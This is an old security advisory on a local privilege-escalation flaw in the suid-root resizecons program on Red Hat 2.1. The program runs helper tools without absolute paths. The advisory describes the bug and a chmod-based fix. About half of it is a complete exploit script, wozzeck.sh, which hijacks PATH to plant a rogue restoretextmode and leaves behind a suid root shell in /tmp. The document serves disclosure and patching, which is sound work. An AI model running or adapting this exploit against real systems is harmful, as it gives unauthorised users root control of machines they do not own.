COMMAND

    /usr/bin/resizecons (Red Hat 2.1)

AFFECTED SYSTEMS

    Red Hat 2.1 linux distribution

PROBLEM

    There  is  a  security  hole  in  Red  Hat 2.1, which installs the
    program  /usr/bin/resizecons  suid  root.   The resizecons program
    allows a user to change the videmode of the console.  During  this
    process, it runs the  program restoretextmode without an  absolute
    pathname, assuming the correct version will be found in the  path,
    while running with root privileges.   It then executes setfont  in
    the  same  manner.    By  setting  the  path   to  find  a   rogue
    restoretextmode, a user can execute an arbitrary program as root.

    As a more amusing aside,  the file /tmp/selection.pid is read  and
    the pid contained  within is sent  a SIGWINCH, allowing  a user on
    the  system  to  force  a  redraw  of  the  screen to an arbitrary
    process (that handles SIGWINCH calls) on the machine.

    If /usr/bin/resizecons needs  to be run  by users other  than root
    at the console, provisions need to be made in the code to  execute
    the  outside  utilities  with  absolute  pathnames,  and  to check
    access rights on files before opening.

--------------------------------------------------------------------
wozzeck.sh:
#!/bin/sh
#
# wozzeck.sh
# exploits a security hole in /usr/bin/resizecons
# to create a suid root shell in /tmp/wozz on a
# linux Red Hat 2.1 system.
#
# by Dave M. (davem@cmu.edu)
#
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/bin/resizecons
then
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/313x37
This exploit is dedicated to
Wozz.  Use it with care.
_EOF_
cat << _EOF_ > /tmp/restoretextmode
#!/bin/sh
/bin/cp /bin/sh /tmp/wozz
/bin/chmod 4777 /tmp/wozz
_EOF_
/bin/chmod +x /tmp/restoretextmode
PATH=/tmp
echo ================ Executing resizecons
/usr/bin/resizecons 313x37
/bin/rm /tmp/restoretextmode
/bin/rm /tmp/313x37
if test -u /tmp/wozz
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi
--------------------------------------------------------------------

SOLUTIONS

    Temporary patch would be to turn suid bit off

        chmod -s /usr/bin/resizecons